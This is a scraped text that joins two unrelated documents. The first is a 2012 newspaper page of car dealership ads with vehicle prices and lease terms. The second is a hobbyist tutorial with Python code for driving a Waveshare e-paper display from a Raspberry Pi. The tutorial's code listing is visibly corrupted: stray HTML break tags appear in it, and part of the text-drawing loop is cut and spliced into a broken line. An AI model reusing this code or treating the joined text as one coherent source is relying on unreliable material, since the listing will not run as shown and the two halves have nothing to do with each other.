#12NT980. 4x4, LS pkg., 4.8 V8, HD trailering. MSRP................................................$34,930.00 DELPHA DISCOUNT ............................1,899.95 SUPPLIER PRICE ..............................33,030.05 REBATE ................................................3,500.00 LOVE IT OR LEAVE IT REBATE .............500.00 TRADE IN BONUS CASH......................1000.00
$
2012 CHEV 1/2 TON CREW CAB
28,03005*
#12NT879. 4x4, 1 LT pkg., 5.3 V8, All Star Edition, chrome steps. MSRP................................................$39,404.00 DELPHA DISCOUNT ............................2,284.97 SUPPLIER PRICE ..............................37,119.03 REBATE ................................................2,500.00 LOVE IT OR LEAVE REBATE 500.00 TRADE IN BONUS CASH 1000.00
#12NB154. Red.
2012 BUICK ENCLAVE
per month
#12NB985. Silver.
$1500 down plus tax, fees and plates.
$
33,119
39 mo. lease, 12,000 miles per year with approved credit through ally 20¢ per mile extra for excess mileage
27607
$1500 down plus tax, fees and plates.
$
39 mo. lease, 12,000 miles per year with approved credit through ally 20¢ per mile extra for excess mileage
39078
2011 CHEV IMPALA ............................... 12D33 2012 CHEV IMPALA ............................... 12D39
2012 CHEV IMPALA ............................... 12F69 2012 CHEV MALIBU............................... 12C24
PRE-OWNED VEHICLES
1725 East Fifth Street, Delphos VISIT US ON THE WEB @
Service - Body Shop - Parts Mon., Tues., Thurs. & Fri. 7:30 to 5:00 Wed. 7:30 to 7:00 Closed on Sat.
CHEVROLET • BUICK
IN DELPHOS 419-692-3015 TOLL FREE 1-888-692-3015
Sales Department Mon. & Wed. 8:30 to 8:00 Tues., Thurs. & Fri. 8:30 to 5:30; Sat. 8:30 to 1:00
2011 BUICK REGAL ............................... 12G20 2011 CHEV CRUZE ................................ 12G51A 2011 CHEV IMPALA ............................... 12D35 2011 CHEV IMPALA ............................... 12D34 2011 CHEV IMPALA ............................... 12G55A 2011 CHEV IMPALA ............................... 11K152 2011 CHEV MALIBU ............................... 11I125 2011 CHEV SILVERADO 1500 ............... 12B12 2011 CHEV SILVERADO 1500 ............... 12E48 2010 CHEV EQUINOX ............................ 12F71 2010 CHEV IMPALA ............................... 12E58 2010 CHEV IMPALA ............................... 11I108 2010 CHEV MALIBU............................... 12G76 2009 BUICK LaCROSSE ........................ 12A1 2009 PONTIAC G6.................................. 12E66 2009 PONTIAC VIBE .............................. 11L162 2008 CHRYSLER ASPEN Limited ......... 12H85 2008 BUICK ENCLAVE .......................... 12H78 2008 BUICK LUCERNE .......................... 12F50A
2008 CHEVROLET HHR......................... 12G73A 2008 GMC ENVOY.................................. 11K154 2008 PONTIAC G6.................................. 12E67 2007 CHEVY EQUINOX LT..................... 12H82 2007 BUICK LUCERNE .......................... 11H96 2007 BUICK RENDEZVOUS .................. 11L163 2007 CHEV AVALANCHE....................... 12E61 2007 CHEVROLET COLORADO ........... 12D32 2007 CHEV EQUINOX ............................ 12H82 2006 CHEV TRAILBLAZER ................... 12E59 2005 BUICK RENDEZVOUS .................. 12F70 2004 CHEVY SILVERADO 4x4 WT ........ 12H74A 2004 CHEV SILVERADO 1500 ............... 12H74A 2003 CHEV SILVERADO EXT. 1/2 ton 4x4 . 12H68A 2003 CHEV TRAILBLAZER ................... 12E42A 2001 PONTIAC GRAND AM COUPE ..... 12H84 2001 FORD FOCUS 4 dr. ....................... 12H92A 2000 PONTIAC GRAND PRIX ................ 12E33C 1995 BUICK LeSABRE Custom ............ 12H83
12– The Herald
Saturday, August 25, 2012
There’s never been a better time to save on a new Ford from Statewide.
1,500
199 24
0.0
1,750
1,500
179 24
SYNC® AppLink"
SYNC® with MyFord® or SYNC® with MyFord Touch®
Easy Fuel® � Capless Fuel-Filler
4
1,500 $1999
1,500
199 24 0.0 1,750 SYNC® with MyFord® or SYNC® with MyFord Touch® 199 24
SYNC® with MyFord® or SYNC® with MyFord Touch®
0.0 1,750 1.9Fuel® � Capless Fuel-Filler 2,750 Easy 0.0 1,750
60 months
0.0 179
1,500
1,500 $2279
179 24 60
60 SYNC® AppLink" 750
24
5,750
Trade Assistance
Easy Fuel® � Capless Fuel-Filler
5.0L V8 SYNC® AppLink"
2013 ESCAPE SE
$ 0.0
1,0001,750 CASH BACK*
1,750 mon, wed 9-8 tue, thur, fri 9-6 sat 9-6 sun closed
1.9 0 1.9
1108 West Main St 2013 Van Wert Ohio, 45891 419-238-0125 800-262-3866
$
mon - fri 7:30-5:00 sat, sun closed
2,000 2,750
0.0
2005 Mercury Grand Marquis
5.0L V8 *Lease is 10,500 miles per year with approved credit through Ford Credit. Offer expires 10/1/12.
60
750
# 501549A. Local trade-in, non-smoker, extra clean, priced to sell!!
$
# 501339A. All wheel drive, leather, power moonroof, hard to find!!
2005 Mercury Montego Premier
6744
# 40102B. Power moonroof, leather, spoiler, alloys, a must see!!
2002 Chevy Impala LS
USED CARS
1108 West Main St Van Wert Ohio, 45891 419-238-0125 800-262-3866
2,750
0.0 0.0
UP TO
60 INCLUDES $1,000 TRADE ASSISTANCE Trade Assistance 750
5,750 BACK $5,000 CASH 5,750
Trade Assistance
$
$
$
# 40060A. 1-owner, heated leather, moonroof, chrome wheels!!
2010 Ford Escape Limited
9399
# 9992A. Only 24,000 miles!! # 501099A. Chrome wheels, # 50174P. Local car, 1-owner, 419-238-0125 800-262-3866 1-owner, power moonroof, 24,000 miles, extra clean!! heated leather!! non-smoker!
2006 Pontiac Dodge St 2009 2009 Nissan 1108 Westmon - fri 7:30-5:00 Main mon, wed 9-8 tue, thur, fri 9-6 Altima G6 Avenger 45891 sat, sat 9-6Vanclosed Ohio, sun closed sun Wert
6987
$
# 14527ATrailer tow, running boards, only 71,000 miles!!
2002 Chevy Tahoe LS 4X4
8829
# 50153P. Alloy wheels, leather, Lincoln luxury!!
2006 Lincoln Zephyr
5.0L V8
$
8968
$
# 501309A4X4, 5.4 V8, local trade-in, priced to sell!!
2005 Ford F-150 Supercab FX4
8995
2009 Ford Flex SE
$
18,498
# 50163P. The right color!! Fiberglass cap, V8, extra clean!!
2010 Ford F 150 Supercrew
9997
mon, wed 9-8 tue, thur, fri 9-6 sat 9-6 sun closed
$
12,989
2011 Ford Edge Limited
mon - fri 7:30-5:00 sat, sun closed
$
14,997
2012 Ford Flex SEL
$
# 50167P. 7 passenger, great fuel economy, don’t miss it!!
16,941
2012 Dodge Durango R/T
$
20,896
$
# 50136P. Chrome wheels, rear camera, sync, my ford touch!!!
23,890
# 50093P. Only 15,000 miles! 7 passenger, Sync, reverse sensing!
$
24,825
$
# 40058B. Only 9200 miles! Like new, 1-owner, Nav, moonroof, WOW!
33,997
StateWide
Go Further
800-262-3866 or 419-238-0125
Mon. & Wed. 9 AM - 8 PM; Tues., Thurs., Fri. 9 AM-6 PM; Sat. 9 AM-3 PM
1108 West Main St. Van Wert, OH
This action might not be possible to undo. Are you sure you want to continue? | https://www.scribd.com/doc/103872558/DH-0825 | CC-MAIN-2016-07 | refinedweb | 24,839 | 74.49 |
I am having some issues, I logged in to moralis using my wallet, and now I want to display all the NFTs I have in my wallet on some pannel in unity, How can I fetch the NFTs data in Unity and How can I use the NFT image to display on Panel in unity, Please help anyone.
An example of how to make them render will be here
unlike the example in the docs, this project is deprecated and contains alot of invalid syntax (old moralis unity sdk version), you can use the render nft part along with the syntax on the docs for fetching the nft to render
I checked this, but what exactly do I need to extract chain id and other details from the database and then pass that into the parameters instead of directly adding the address.
which details from the database ?
you can use the connected user address and any chain
okay, thanks for your reply I’ll try and check what can I do…
@0xprof actually I am trying to fetch all the nfts that are in my wallet and want to display them in unity…I checked the above methods but there seems to be something I am not getting correctly, how should I add all those nft metadata from my wallet to moralis database, so that I can fetch them in unity…If you have any working code or example please help.
you can place them in the db, but you dont need them there, you can fetch using the web3api and then displaythem, but if you cant to fetch and place them in the db, it is fairly the same process, you can fetch and then push it to the db and then displythem from the db
Hi,
I am essentialy trying to populate an nft inventory system on top of the mmorg project but Im getting stuck at the first step. I am confused as the web3 sign in and photon are working great.
Im trying to add the example Unity code snippet posted above “” to the " Web3 MMORPG Example Demo" in Unity but im getting an error “CS0246: The type or namespace name ‘MoralisUnity’ could not be found”.
I have used the similar inventory functionality in the other project " Build an In-Game Unity NFT Shop" and it compiles and works fine.
Im not sure if im using the wrong sdk or if ones not compatible with another but any advice would be appreciated.
That snippet is for SDK versions 1.2.0 or newer.
You can use the older
using System.Collections.Generic; using Moralis.Web3Api.Models; using MoralisWeb3ApiSdk; public async void fetchNFTs() { NftOwnerCollection polygonNFTs = await MoralisInterface.GetClient().Web3Api.Account.GetNFTs("0x75e3e9c92162e62000425c98769965a76c2e387a".ToLower(), ChainList.polygon); print(polygonNFTs.ToJson()); }
okay thankyou so much, I will give that a try tomorrow and let you know how it goes
so the code does compile now as I was trying to use the older version of the SDK, now for the fun part of trying to add a nft display method to my ui panel
out of curiosity, should I be okay to continue build and publish my project on a previous sdk or is the newer version recommened? If so, it would be really helpful if the dev’s could update the Unity boilerplate projects to work with the latest sdk version
It is recommended you use the newer SDK if you are able to migrate existing/older code over, and for new projects.
ah okay thankyou I will use the newer sdk, the video is also very helpfull
how to do for any chain user used while login with metamask
public async void fetchNFTs() { NftOwnerCollection polygonNFTs = await Moralis.Web3Api.Account.GetNFTs("0x75e3e9c92162e62000425c98769965a76c2e387a".ToLower(), ChainList.polygon); Debug.Log(polygonNFTs.ToJson()); }
This is an example you can look at to get the current wallet address.
This gets the detail but I am not able to fetch any image from this method…can you please if possible explain in detail…
I was following the same tutorial but have few differences that make all issue I guess.
- I don’t have minted nfts, all the nfts are in my wallet
- So there’s no shop inventory, I fetched the nfts with moralis function shown in tutorial, but then not able to display it.
What I did use the same code and fetch the nft detail but my nfts are not showing, please help me in detail if possible.
I want to make user login with metamask, then on some pannel all nfts present in person’s wallet should be displayed. | https://forum.moralis.io/t/display-all-nfts-in-unity/15691 | CC-MAIN-2022-40 | refinedweb | 767 | 54.6 |
When Java developers come to a task of writing a a new class which should have a
Map datastructure field, accessed simultaneously by several threads, they usually try to solve the synchronization issues invloved in such a scenario by simply making the map an instance of
ConcurrentHashMap .
public class Foo { private Map<String, Object> theMap = new ConcurrentHashMap<>(); // the rest of the class goes here... }
In many cases it works fine just because the contract of
ConcurrentHashMap takes care of the potential synchronization issues related to reading/writing to the map. But there are cases where it's not enough, and a developer gets race conditions which are hard to predict, and even harder to find/debug and fix.
Let's have a look, at the next example:
public class Foo { private Map<String, Object> theMap = new ConcurrentHashMap<>(); public Object getOrCreate(String key) { Object value = theMap.get(key); if (value == null) { value = new Object(); theMap.put(key, value); } return value; } }
Here we have a "simple" getter (
getOrCreate(String key) ), which gets a key and returns the value assosiated with the given key in
theMap . If there is no mapping for the key, the method creates a new value, inserts it into
theMap and returns it.
So far so good. But what happens when 2 (or more) threads call the getter with the same key when there is no mapping for the key in
theMap? In such a case we might receive a race condition:
Suppose thread t1 enters the function and comes to line 7. Its value is
null . At this point thread t2 enters the function and also comes to line 7. Its value is also obviously
null . Therefore from this point the two threads will enter the
if statement and execute lines 8 and 9, thus creating two different new
Objects. Upon returning from the getter each thread will get a different
Object instance, violating programmer's wrong assumption that by using
ConcurrentHashMap "everything is synchronized" and therefore two different threads should get the same value for the same key.
To solve this issue we can synchronize the entire method, thus making it atomic:
public class Foo { private Map<String, Object> theMap = new ConcurrentHashMap<>(); public synchronized Object getOrCreate(String key) { Object value = theMap.get(key); if (value == null) { value = new Object(); theMap.put(key, value); } return value; } }
But this is a bit ugly, and uses
Foo instace's monitor, which may affect performance if there are other methods in this class which are
synchronized. Also a common rule of thumb is to try to eliminate using synchronized methods as much as possible.
A much better approach should be using Java 8
Map's
computeIfAbsent(K key, Function
mappingFunction), which, in
ConcurrentHashMap's implementation runs atomically:
public class Foo { private Map<String, Object> theMap = new ConcurrentHashMap<>(); public Object getOrCreate(String key) { return theMap.computeIfAbsent(key, k -> new Object()); } }
The atomicity of
computeIfAbsent(..) assures that only one new
Object will be created and put into
theMap, and it'll be the exact same instance of
Object that will be returned to all threads calling the
getOrCreate function.
Here, not only the code is correct, it's also cleaner and much shorter.
The point of this example was to introduce a common pitfall of blindly relying on
ConcurrentHashMap as a majical synchronzed datastructure which is threadsafe and therefore should solve all our concurrency issues regarding multiple threads working on a shared
Map.
ConcurrentHashMap is, indeed, threadsafe. But it only means that all read/write operations on such map are internally synchronized. And sometimes it's just not enough for our concurrent environment needs, and we have to use some special treatment which will guarantee atomic execution. A good practice will be to use one of the atomic methods implemented by
ConcurrentHashMap, i.e:
computeIfAbsent(..),
putIfAbsent(..), etc.
{{ parent.title || parent.header.title}}
{{ parent.tldr }}
{{ parent.linkDescription }}{{ parent.urlSource.name }} | https://dzone.com/articles/concurrenthashmap-isnt-always-enough | CC-MAIN-2017-26 | refinedweb | 646 | 50.26 |
Jellified Light weight switch web component built on vanilla javascript
jelly-switch
A simple, customizable and jellified switch built as web component using ES6 javascript
NOTE:
- This component is still in work in progress WIP. So there is a high chance that the API can change. So please be notified
This micro web component(~1.7kB) can be used for any framework
Try Now
Install
1. via npm
npm i jelly-switch
(or)
2.via script tag
<script src =""></script>
Usage
1.Import into module script(required only for npm install):
import { JellySwitch } from "jelly-switch"
2.Use it in your web page like any other HTML element
<jelly-switch</jelly-switch>
3. Like any other input type, label can be used to bind with the jelly-switch element using 'slot' attribute as shown below. For more information on this, refer the Slots sub section in API section
<jelly-switch <p slot="content-left">On/Off</p> </jelly-switch>
API
Attributes
checked
Add this attribute to set the switch to toggled / checked mode i.e., equivalent to 'checked' attribute of input type
<jelly-switch id="js1" checked></jellyswitch>
(or)
js1.checked = true
disabled
Add this attribute to disable the switch and the opacity will be decreased to half and user can not interact with the switch and cursor will be changed to 'not-allowed'
<jelly-switch id ="js1" disabled></jellyswitch>
(or)
js1.disabled = true;
Slots
- For achieving the
labelbinding with the
inputby
forattribute,
slotfeature has been used in this custom element
- For label to position to left of the
jelly-switch, slot attribute with the value
content-leftcan be used for any other native HTML Element as shown in the example below
<jelly-switch> <p slot="content-left">On/Off</p> </jelly-switch>
- For label to position to right of the
jelly-switch, slot attribute with the value
content-rightcan be used for any other native HTML Element as shown below
<jelly-switch> <p slot="content-right">On/Off</p> </jelly-switch>
Styling
The switch component can be styled as a normal and regular HTML element in CSS. There are list of CSS properties below with the default values
The CSS variables can be set dynamically. For example, refer the following snippet
document.documentElement.style.setProperty('--off-color', 'rgba(25,89,79,0.7');
Events
toggle
- The toggle event is triggered when the user toggles the switches either by
- clicking on the switch (or)
- pressing
spaceon the keyboard when the switch is focused
- The present value can be accessed from
event.detail.valueas shown in the below example
document.documentElement.addEventListener('toggle',handleToggle(e));
or
<jelly-switch</jelly-switch>
and value can be obtained as follows
function handleToggle(e) { //The value after the user toggles the switch can be accessed from the below code console.log('The present value of switch is '+e.detail.value); //here e is the event object }
Accessibility
- ARIA has been handled
ToDos
- [x] Handle keyboard
spaceevent
- [x] Add box-shadow to focus
- [x] Accessibility check
- [x] Basic Unit testing
- [x] Lazy property handling
- [x] Documentation
- [x] npm publish
- [x] Add label 'for' support
- [x] Minify js file
- [x] Support safari browser
- [ ] Writing the release notes (changeLog.md file)
- [ ] Adding unit test cases
- [ ] Write contribute.md file
- [ ] handling drag event
License
MIT License (c) Akhil Sai
Made with ❤️ by Akhil | https://vaadin.com/directory/component/akhil0001jellyswitch/0.2.3 | CC-MAIN-2021-49 | refinedweb | 554 | 57.81 |
5. Type System¶
5.1. Type inference¶
Static Typing (Java, C++, Swift)
String name = new String("José Jiménez")
Dynamic Typing (Python, PHP, Ruby)
name = str('José Jiménez')
Type inference
name = 'José Jiménez'
5.2. Type Annotations¶
Types are not required, and never will be – Guido van Rossum, Python BDFL
Since Python 3.5
SyntaxErrorin Python before 3.5
Sometimes called “type hints”
Good IDE will give you hints
Types are used extensively in system libraries
More and more books and documentations use types
To type check use:
mypyor
pyre-check(more in CI/CD Tools)
5.2.2. Collections¶
my_list: list = list() my_set: set = set() my_tuple: tuple = tuple() my_dict: dict = dict()
my_list: list = [] my_set: set = set() my_tuple: tuple = () my_dict: dict = {}
from typing import List, Tuple, Dict, Set my_list: List[float] = [5.8, 2.7, 5.1, 1.9] my_set: Set[int] = {0, 2, 4} my_tuple: Tuple[str] = ('setosa', 'virginica', 'versicolor') my_dict: Dict[int, str] = {0: 'setosa', 1: 'virginica': 2: versicolor}
5.2.3. Types do not enforce checking¶
This code will run without any problems
Although
mypyor
pyre-checkwill throw error
name: int = 'Jan Twardowski' age: float = 30 is_adult: int = True
5.2.4. Why?¶
Good IDE will highlight, incorrect types
def sum_numbers(a: int, b: float) -> int: return int(a + b) sumuj_liczby(1, 2.5) sumuj_liczby('a', 'b')
5.2.5. More advanced topics¶
Note
The topic will be continued in chapter: Type Annotation
5.3. Problematic types¶
5.3.1.
dict vs.
set¶
Both
setand
dictkeys must be hashable
Both
setand
dictuses the same
{and
}braces
Despite similar syntax, they are different types
my_data = {} isinstance(my_data, dict) # True isinstance(my_data, set) # False my_data = {1} isinstance(my_data, dict) # False isinstance(my_data, set) # True my_data = {1: 1} isinstance(my_data, dict) # True isinstance(my_data, set) # False
{} # dict {1} # set {1, 2} # set {1: 2} # dict {1, 2,} # set {1: 2,} # dict {1: 2, 3: 4} # dict {1, 2, 3, 4} # set
5.3.2.
tuple vs.
str¶
what = 'foo' # str what = 'foo', # tuple with str what = 'foo'. # SyntaxError: invalid syntax
what = ('foo') # str what = ('foo',) # tuple with str what = ('foo'.) # SyntaxError: invalid syntax
5.3.3.
tuple vs.
float and
int¶
what = 1.2 # float what = 1,2 # tuple with two int what = (1.2) # float what = (1,2) # tuple with two int
what = 1.2, # tuple with float what = 1,2.3 # tuple with int and float what = (1.2,) # tuple with float what = (1,2.3) # tuple with int and float
what = 1. # float what = .5 # float what = 1.0 # float what = 1 # int what = (1.) # float what = (.5) # float what = (1.0) # float what = (1) # int
what = 10.5 # float what = 10,5 # tuple with two ints what = 10. # float what = 10, # tuple with int what = 10 # int what = (10.5) # float what = (10,5) # tuple with two ints what = (10.) # float what = (10,) # tuple with int what = (10) # int
what = 1.,1. # tuple with two floats what = .5,.5 # tuple with two floats what = 1.,.5 # tuple with two floats what = (1.,1.) # tuple with two floats what = (.5,.5) # tuple with two floats what = (1.,.5) # tuple with two floats | http://python.astrotech.io/data-methods/type-system.html | CC-MAIN-2019-18 | refinedweb | 524 | 75.81 |
Tax
Have a Tax Question? Ask a Tax Expert
Hello
If you are trying to file past year return (earlier than 2015) you are going to need to mail those because e-file is not available for prior years.
The Goodwill Industries has started in many places to do free returns also VITA offers free services for filing. Will they do a prior year I do not know but you can see.
You are required to click a positive rating if I am to be credited with the response.You have to actively click on a rating and click submit. Smiley Faces or Stars. | http://www.justanswer.com/tax/9m1n5-wichita-kansas-trying-file-taxes.html | CC-MAIN-2017-13 | refinedweb | 104 | 73.58 |
Prorgammers are lazy, we all know that. Whenever we come across some API we want to make a wrapper for it in order to use it more easily. Microsoft wrote its "Foundation Classes", and every day someone posts an article about his own new wrapper class here on CodeProject.com. I have also decided to do so.
I needed to control my Winamp2 from another app, and after doing some research if finally found the fine Winamp2 API documentation. But after a few minutes I was tired to type all those
SendMessages with a number as parameter that no one on earth would want to remember. After playing around with the official Winamp2 API I had to discover that the API doesn't provide some handy functions such like getting the current volume. So what now? Well, I began writing the wrapper. Soon I started Spy++ to get access to some handy but undocumented API calls, e.g. reading the volume or generating a HTML playlist. Woohoo! Now I felt it was time to share my work with you :-)
My main goal was to keep the wrapper simple as possible, so that even beginners would have no problems using it. The result is one single header-file that needs to be included to your workspace. No more! Now let's start, I'll explain the most important steps and functions.
Using this class is easy as can be. Just
#include "winamp2.h" to your workspace. Next, create our wrapper class variable somewhere in your project:
CWinamp amp // create the wrapper variable named "amp"
Before you can use all the functions you need to
FindWinamp(). For most people it safe enough to call this function without any parameters. Winamp can be opened with a different window class but the standard "Winamp v1.x" by starting it with the parameter /CLASS. But most people don't do so, so you don't have to worry about the
FindWindow() parameter. The function returns
true, if Winamp has been found. Now you are ready to use all the nifty functions.
There are so many functions that I don't want to explain them all in detail. These are probably the most important ones:
void Previous(); void Next(); void Play(); void Pause(); void Stop(); const char* GetCurrentTitle()
Should be self-explanatory I hope :-) So if you want to go to the next track just call the
Next() function like that:
CWinamp amp; if(amp.FindWinamp()) { // Winamp has been found, play next track amp.Next(); }
The functions all have names that explain what they do, e.g.
TrackGetPositionMSec(). This returns the track's current postion in milliseconds. There are three functions that need to be discussed a bit more in detail, but acutally they are easy to use as well. The functions are as follows:
int GetVolume(); void SetVolume(int volume); int EQGetData(int band); void EQSetData(int band, int value); int EQGetPreampValaue();
The
GetVolume() functions returns a value between 0 and 255. 0 means volume turned off completely (i.e. silent), whereas 255 means full volume. This way you can pass a value of 0 to 255 to
SetVolume().
EQGetData(int band) takes a value of 0-9 as parameter, representing one of the ten bands of the equalizer. It returns a value between 0 and 63. 0 means a value of -20 dB and 63 a value of +20 dB. Consider this, if you want to represent the value by e.g. a
CSliderCtrl, make sure to set its range like that:
SetRange(0, 63). To set the value of a specific band, call
EQSetData(). The first parameter is the band (0-9), the second the value in the range from 0-63.
Note: For some reason, Winamp does NOT refresh the equalizer bars during runtime, but the changes are applied. You need to
RestartWinamp() to make the changes visible in the equalizer. Blame the programmers of winamp ;-)
EQGetPreampValaue() also returns the preamp value in the range of 0-63.
I'd say this is everything you need to know in order to understand the class. If you have any futher questions, feel free to post a comment or send me a mail. The class has been successfully tested with Winamp 2.81
General
News
Question
Answer
Joke
Rant
Admin | http://www.codeproject.com/KB/audio-video/winamp2api.aspx | crawl-002 | refinedweb | 716 | 73.88 |
At VueConf Toronto, Ionic announced the first alpha release of
@ionic/vue, making it possible to add Ionic 4 to any Vue.js project, getting access to Ionic's APIs in a Vue.js-friendly manner.
Ionic lets web developers build, test, and deploy cross-platform hybrid mobile apps. Before version 4, Ionic's primary focus was Angular, but with Ionic 4 the goal is to make Ionic work seamlessly with any framework to provide a flexible user interface component layer.
The Ionic team wanted to verify the success of the Vue.js and Ionic integration to ensure independence from Angular. Through a collaboration with Modus Create, the viability of Ionic and Vue.js integration was put to the test. Modus leverages Ionic Framework, Vue.js, and Capacitor to create Beep,an app using Ionic Framework, Vue, and Capacitor that allows anyone to check if their email has been part of any data breaches.
To use Ionic within a Vue.js application, install the
@ionic/vue package with npm:
npm install @ionic/vue
Then, with the application's main.js, import the Ionic framework:
import Vue from 'vue'; import App from './App.vue'; import { Ionic } from '@ionic/vue'; Vue.use(Ionic); new Vue({ render: h => h(App) }).$mount('#app');
Ionic is an open source Framework with a collection of UI components for building cross-platform applications using HTML, CSS, and JavaScript. Ionic applications can get deployed natively to iOS and Android devices, to the desktop with Electron, or as progressive web apps.
According to Mike Hartington of Ionic, The Ionic team seeks early feedback on how to improve
@ionic.vue:
We’ve always said that Ionic’s biggest asset is our large, passionate community and now we need your feedback. If you’re a big Vue fan and want to give Ionic Framework a try, let us know how it goes. You can reach out to us on the Ionic forum, slack, or GitHub.
Initial community feedback via Twitter is mostly positive. John Papa, principal developer advocate at Microsoft, asked about plans for integrating Ionic with the vue-cli add command, and received confirmation from Hartington that Ionic will "offer a vue project type from our cli, as well as a plugin to add."
With the recent NativeScript support for Vue.js and now Ionic, full-stack deveoper Rich Klein expresses interest in
@ionic/vue:
Vue.js is on a hot streak. Definitely want to test this for a project when the beta is ready.
@ionic/vue is available under the MIT open source license. Contributions are welcome via the
@ionic/vue GitHub package and should follow the Ionic contribution guidelines and code of conduct.
Community comments | https://www.infoq.com/news/2018/11/ionic-vue-integration-alpha/?utm_campaign=infoq_content&utm_source=infoq&utm_medium=feed&utm_term=global | CC-MAIN-2021-04 | refinedweb | 447 | 57.06 |
Compile Error for Import com.sun.javadoc.*;
I need to write some simple doclets and found some beginner code on the Sun website. The first line of the sample app is:
import com.sun.javadoc.*;
However, I get a compile error:
C:\JavaDoc\Doclet\ListClass.java:1:package com.sun.javadoc does not exist
import com.sun.javadoc.*;
I found the com.sun.javadoc package in the tools.jar file in the lib directory of my sdk. So I added the following to my classpath:
C:\j2sdk1.4.2_08\lib;
Then I recompiled but received the same error. What have I done wrong? I'm on Windows XP.
TIA. | http://www.java-index.com/java-technologies-archive/513/java-compiler-5134686.shtm | crawl-001 | refinedweb | 109 | 64.07 |
Introduction: Waveshare EPaper and a RaspberryPi
I'm a display nerd, I know. So I got this Waveshare ePaper 2.9" display from ama...n and it was a little nasty to adopt the software, so here is how it went for me.
What to expect:
Some python code for the raspberry to run this display.
- uses good old PythonImagingLibrary
- can load any Image
- allows image manipulation and drawing
References
Here is the waveshare Wiki page with the somewhat useful info's you may need. Unfortunately I am missing info about the memory layout just to know where I can expect to write a bit for a certain pixel. It also lacks timing infos, the code does a lot of delay's and there is a busy pin to read from but when and how I use which ??? The code also contains initialization code that is copied to the display and you will get no glue what it is. And no the PDF document about the display does not reveal this either.
After some experimentation, I can get a refresh rate of about 2fps for a complete image refresh, with the partial update function. The pixels do not completely reset, I guess you need to do the long refresh cycle which inverts everything a view times to get completely clean display back.
Update:
Extensive explanation of the Waveshare example code...
Connections to Raspberry
I used a Pi3 but it should work with any.
Search the web for "Raspberry pinout" e.g. this one and match with the waveshare doc, or simply use this table..
e-Paper RaspberryPi<br>3.3V 3.3V (pin1)<br>GND GND (pin6)<br>DIN MOSI (pin19)<br>CLK SCLK (pin23)<br>CS CE0 (pin24)<br>DC BCM25(pin22)<br>RST BCM17(pin11)<br>BUSY BCM24(pin18)
The Code
There is the main.py which runs the fancy stuff and there is EPD_driver.py which is a stripped down version of the interfacing code provided py waveshare. I thrown out almost everything which did not just copy an image to the display - it.. eh.. well they tried, but putting the frame together is much easier done on the Pi and the copied over with a single command.
Just download the attached paperDisp.zip. Then run the code with "python main.py". You will need to install at least PIL and GPIO phyton libs like this.
sudo apt-get install python-requests python-pil python-rpi.gpio
Also make sure the SPI is enabled, edit /boot/config.txt and uncomment the line
dtparam=spi=on
main.py - this does init the display, gets some data from a duckduckgo search and displays that along with the current time. (instructables messed up the code, use the attached zip file)
#!/usr/bin/python<br>import spidev as SPI # where the display connects import Image, ImageDraw, ImageFont # PIL - PythonImageLibrary import time, datetime, sys, signal, urllib, requests from EPD_driver import EPD_driver def handler(signum, frame): print 'SIGTERM' sys.exit(0) signal.signal(signal.SIGTERM, handler) bus = 0 device = 0 disp = EPD_driver(spi = SPI.SpiDev(bus, device)) print "disp size : %dx%d"%(disp.xDot, disp.yDot) print '------------init and Clear full screen------------' disp.Dis_Clear_full() disp.delay() # display part disp.EPD_init_Part() disp.delay() imagenames = [] search = "" if search: req = requests.get(search) if req.status_code == 200: for topic in req.json()["RelatedTopics"]: if "Topics" in topic: for topic2 in topic["Topics"]: try: url = topic2["Icon"]["URL"] text = topic2["Text"] if url: imagenames.append( (url,text) ) except: # print topic pass try: url = topic["Icon"]["URL"] if url: imagenames.append( url ) except: # print topic pass else: print req.status_code # font for drawing within PIL myfont10 = ImageFont.truetype("amiga_forever/amiga4ever.ttf", 8) myfont28 = ImageFont.truetype("amiga_forever/amiga4ever.ttf", 28) # mainimg is used as screen buffer, all image composing/drawing is done in PIL, # the mainimg is then copied to the display (drawing on the disp itself is no fun) mainimg = Image.new("1", (296,128)) name = ("images/downloaded.png", "bla") skip = 0 while 1: for name2 in imagenames: print '---------------------' skip = (skip+1)%7 try: starttime = time.time() if skip==0 and name2[0].startswith("http"): name = name2 urllib.urlretrieve(name[0], "images/downloaded.png") name = ("images/downloaded.png", name2[1]) im = Image.open(name[0]) print name, im.format, im.size, im.mode im.thumbnail((296,128)) im = im.convert("1") #, dither=Image.NONE) # print 'thumbnail', im.format, im.size, im.mode loadtime = time.time() print 't:load+resize:', (loadtime - starttime) draw = ImageDraw.Draw(mainimg) # clear draw.rectangle([0,0,296,128], fill=255) # copy to mainimg ypos = (disp.xDot - im.size[1])/2 xpos = (disp.yDot - im.size[0])/2 print 'ypos:', ypos, 'xpos:', xpos mainimg.paste(im, (xpos,ypos)) # draw info text ts = draw.textsize(name[1], font=myfont10) tsy = ts[1]+1 oldy = -1 divs = ts[0]/250 for y in range(0, divs): newtext = name[1][(oldy+1)*len(name[1])/divs:(y+1)*len(name[1])/divs] # print divs, oldy, y, newtext) #draw time now = datetime.datetime.now() tstr = "%02d:%02d:%02d"%(now.hour,now.minute,now.second) # draw a shadow, time tpx = 36 tpy = 96 for i in range(tpy-4, tpy+32, 2): draw.line([0, i, 295, i], fill=255) draw.text((tpx-1, tpy ), tstr, fill=0, font=myfont28) draw.text((tpx-1, tpy-1), tstr, fill=0, font=myfont28) draw.text((tpx , tpy-1), tstr, fill=0, font=myfont28) draw.text((tpx+2, tpy ), tstr, fill=0, font=myfont28) draw.text((tpx+2, tpy+2), tstr, fill=0, font=myfont28) draw.text((tpx , tpy+2), tstr, fill=0, font=myfont28) draw.text((tpx , tpy ), tstr, fill=255, font=myfont28) del draw im = mainimg.transpose(Image.ROTATE_90) drawtime = time.time() print 't:draw:', (drawtime - loadtime) listim = list(im.getdata()) # print im.format, im.size, im.mode, len(listim) listim2 = [] for y in range(0, im.size[1]): for x in range(0, im.size[0]/8): val = 0 for x8 in range(0, 8): if listim[(im.size[1]-y-1)*im.size[0] + x*8 + (7-x8)] > 128: # print x,y,x8,'ON' val = val | 0x01 << x8 else: # print x,y,x8,'OFF' pass # print val listim2.append(val) for x in range(0,1000): listim2.append(0) # print len(listim2) convtime = time.time() print 't:conv:', (convtime - loadtime) ypos = 0 xpos = 0 disp.EPD_Dis_Part(xpos, xpos+im.size[0]-1, ypos, ypos+im.size[1]-1, listim2) # xStart, xEnd, yStart, yEnd, DisBuffer # disp.delay() uploadtime = time.time() print 't:upload:', (uploadtime - loadtime) except IOError as ex: print 'IOError', str(ex)</p>
Credits
I used the free font "Amiga Forever" by Freaky Fonts .
